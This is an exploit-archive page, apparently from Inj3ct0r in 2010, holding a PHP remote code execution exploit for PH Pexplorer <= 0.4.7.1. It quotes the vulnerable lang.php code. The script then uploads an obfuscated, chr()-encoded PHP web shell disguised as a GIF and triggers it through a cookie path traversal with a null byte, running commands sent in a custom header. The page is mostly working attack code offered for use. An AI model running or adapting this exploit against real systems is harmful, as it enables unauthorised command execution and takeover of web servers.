PH Pexplorer <= 0.4.7.1 (lang.php) Remote Code Execution

Posted on 04 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>PH Pexplorer &lt;= 0.4.7.1 (lang.php) Remote Code Execution Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================================
PH Pexplorer &lt;= 0.4.7.1 (lang.php) Remote Code Execution Exploit
================================================================


#!/usr/bin/php -q -d short_open_tag=on
&lt;?
print '
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0     _                   __           __       __                     1
 1   /'             __  /'__`        / \__  /'__`                   0
 0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
 1  /_/  /' _ ` / /_/_\_&lt;_  /'___  /    /`'__          0
 0       / /    /   / \__/  \_  \_   /           1
 1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
 0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
 1                   \____/ &gt;&gt; Exploit database separated by exploit   0
 0                   /___/          type (local, remote, DoS, etc.)    1
 1                                                                      1
 0  [+] Site            : Inj3ct0r.com                                  0
 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
 0                                                                      0
 1                    ########################################          1
 0                    I'm eidelweiss member from Inj3ct0r Team          1
 1                    ########################################          0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

PH Pexplorer &lt;= 0.4.7.1 (lang.php) Remote Code Execution Exploit

Vendor: http://bluevirus.ch
Download: http://bluevirus.ch/PH%20Pexplorer?
Author: eidelweiss
contact: g1xsystem@windowslive.com

/*
Vuln find in lang.php code:
...
if(array_key_exists(&quot;Language&quot;,$_COOKIE))
{
	// Open dir with languagefiles
	$dir=opendir(c_langpath);
	$langs=Array();
	
	//	Browse dir and save all language shorthand symbols of existing files
	while($res=readdir($dir))
		if( $res!=&quot;.&quot; and $res!=&quot;..&quot; and is_file(c_langpath.&quot;$res&quot;) )
		{
			$t=basename(is_file($res),&quot;.php&quot;);
			if( strlen($t)==2 ||  strlen($t)==5 )
				$langs[]=$t;
		}

	//	Close dir
	closedir($dir);
	
	//	Lade Sprache, falls vorhanden
	$filename=c_langpath.$_COOKIE['Language'].&quot;.php&quot;;
	if( in_array($_COOKIE['Language'],$langs) and is_file($filename) )
	{
		include($filename);
................

    if( is_file(c_langpath.$file) &amp;&amp; preg_match('/[a-z-]{2,5}.php$/',$file) &amp;&amp; $file!=&quot;htmlentities.php&quot; )
    {
      include(c_langpath.$file);
      $avail_langs[]=array('language' =&gt; $l_language, 'file' =&gt; $l_file, 'author' =&gt; $l_author, 'mail' =&gt; $l_author_m, 'url' =&gt; $l_author_h, 'short' =&gt; $l_shortcuts);
    }
  }
  
  include($l_file);
  
  return $avail_langs;
...............

Nice code !!!

upload evil file, and set cookie: Language: [path to you evil file]

then you can run evil file in all script pages :P

eidelweiss

c0de by Kacper Modify by eidelweiss
*/

if ($argc&lt;4) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host:      target server (ip/hostname)
path:      PH Pexplorer path
cmd:       a shell command (ls -la)
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 127.0.0.1 /PH Pexplorer/ ls -la -P1.1.1.1:80
php '.$argv[0].' 192.168.11.9 /  -p81
-----------------------------------------------------------------------------
');
die;
}

error_reporting(0);
ini_set(&quot;max_execution_time&quot;,0);
ini_set(&quot;default_socket_timeout&quot;,5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i&lt;=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) &lt;= 32 ) | (ord($string[$i]) &gt; 126 ))
   {$result.=&quot;  .&quot;;}
   else
   {$result.=&quot;  &quot;.$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=&quot; &quot;.dechex(ord($string[$i]));}
   else
   {$exa.=&quot; 0&quot;.dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.=&quot;
&quot;; $exa.=&quot;
&quot;;}
  }
 return $exa.&quot;
&quot;.$result;
}
$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo &quot;Connecting to &quot;.$parts[0].&quot;:&quot;.$parts[1].&quot; proxy...
&quot;;
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$cmd=&quot;&quot;;

$port=80;
$proxy=&quot;&quot;;
for ($i=3; $i&lt;$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp&lt;&gt;&quot;-p&quot;) and ($temp&lt;&gt;&quot;-P&quot;)) {$cmd.=&quot; &quot;.$argv[$i];}
if ($temp==&quot;-p&quot;)
{
  $port=str_replace(&quot;-p&quot;,&quot;&quot;,$argv[$i]);
}
if ($temp==&quot;-P&quot;)
{
  $proxy=str_replace(&quot;-P&quot;,&quot;&quot;,$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$sh3ll=
chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x36).chr(0x3c).
chr(0x3f).chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x6f).
chr(0x62).chr(0x5f).chr(0x63).chr(0x6c).chr(0x65).chr(0x61).
chr(0x6e).chr(0x28).chr(0x29).chr(0x3b).chr(0x65).chr(0x63).
chr(0x68).chr(0x6f).chr(0x22).chr(0x2e).chr(0x2e).chr(0x2e).
chr(0x48).chr(0x61).chr(0x63).chr(0x6b).chr(0x65).chr(0x72).
chr(0x2e).chr(0x2e).chr(0x4b).chr(0x61).chr(0x63).chr(0x70).
chr(0x65).chr(0x72).chr(0x2e).chr(0x2e).chr(0x4d).chr(0x61).
chr(0x64).chr(0x65).chr(0x2e).chr(0x2e).chr(0x69).chr(0x6e).
chr(0x2e).chr(0x2e).chr(0x50).chr(0x6f).chr(0x6c).chr(0x61).
chr(0x6e).chr(0x64).chr(0x21).chr(0x21).chr(0x2e).chr(0x2e).
chr(0x48).chr(0x61).chr(0x75).chr(0x72).chr(0x75).chr(0x2e).
chr(0x2e).chr(0x5e).chr(0x5f).chr(0x5e).chr(0x2e).chr(0x2e).
chr(0x44).chr(0x45).chr(0x56).chr(0x49).chr(0x4c).chr(0x2e).
chr(0x54).chr(0x45).chr(0x41).chr(0x4d).chr(0x2e).chr(0x2e).
chr(0x74).chr(0x68).chr(0x65).chr(0x2e).chr(0x2e).chr(0x62).
chr(0x65).chr(0x73).chr(0x74).chr(0x2e).chr(0x2e).chr(0x70).
chr(0x6f).chr(0x6c).chr(0x69).chr(0x73).chr(0x68).chr(0x2e).
chr(0x2e).chr(0x74).chr(0x65).chr(0x61).chr(0x6d).chr(0x2e).
chr(0x2e).chr(0x47).chr(0x72).chr(0x65).chr(0x65).chr(0x74).
chr(0x7a).chr(0x2e).chr(0x2e).chr(0x2e).chr(0x22).chr(0x3b).
chr(0x69).chr(0x6e).chr(0x69).chr(0x5f).chr(0x73).chr(0x65).
chr(0x74).chr(0x28).chr(0x22).chr(0x6d).chr(0x61).chr(0x78).
chr(0x5f).chr(0x65).chr(0x78).chr(0x65).chr(0x63).chr(0x75).
chr(0x74).chr(0x69).chr(0x6f).chr(0x6e).chr(0x5f).chr(0x74).
chr(0x69).chr(0x6d).chr(0x65).chr(0x22).chr(0x2c).chr(0x30).
chr(0x29).chr(0x3b).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).
chr(0x20).chr(0x22).chr(0x6d).chr(0x79).chr(0x5f).chr(0x64).
chr(0x65).chr(0x6c).chr(0x69).chr(0x6d).chr(0x22).chr(0x3b).
chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).
chr(0x72).chr(0x75).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).
chr(0x45).chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).
chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x48).
chr(0x41).chr(0x55).chr(0x52).chr(0x55).chr(0x5d).chr(0x29).
chr(0x3b).chr(0x64).chr(0x69).chr(0x65).chr(0x3b).chr(0x3f).
chr(0x3e);

$data.='-----------------------------7d6224c08dc
Content-Disposition: form-data; name=&quot;sefile&quot;; filename=&quot;sh3ll.gif&quot;
Content-Type: text/plain

'.$hauru.'
-----------------------------7d6224c08dc
Content-Disposition: form-data; name=&quot;upfile&quot;

Upload file
-----------------------------7d6224c08dc--
';

$packet =&quot;POST &quot;.$p.&quot;htmlentities.php HTTP/1.0
&quot;;
$packet.=&quot;Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc
&quot;;
$packet.=&quot;Content-Length: &quot;.strlen($data).&quot;
&quot;;
$packet.=&quot;Host: &quot;.$host.&quot;
&quot;;
$packet.=&quot;Connection: Close

&quot;;
$packet.=$data;
sendpacketii($packet);
sleep(1);


$packet =&quot;GET &quot;.$p.&quot;lang.php HTTP/1.1
&quot;;
$packet.=&quot;Cookie: Language=../example_dir/sh3ll.gif%00;
&quot;;
$packet.=&quot;HAURU: &quot;.$cmd.&quot;
&quot;;
$packet.=&quot;Host: &quot;.$host.&quot;
&quot;;
$packet.=&quot;Connection: Close

&quot;;
sendpacketii($packet);
if (strstr($html,&quot;my_delim&quot;))
{
$temp=explode(&quot;my_delim&quot;,$html);
die($temp[1]);
}
echo &quot;Exploit err0r :(&quot;;
echo &quot;INDONESIAN HACKER STILL ROCK&quot;;
?&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20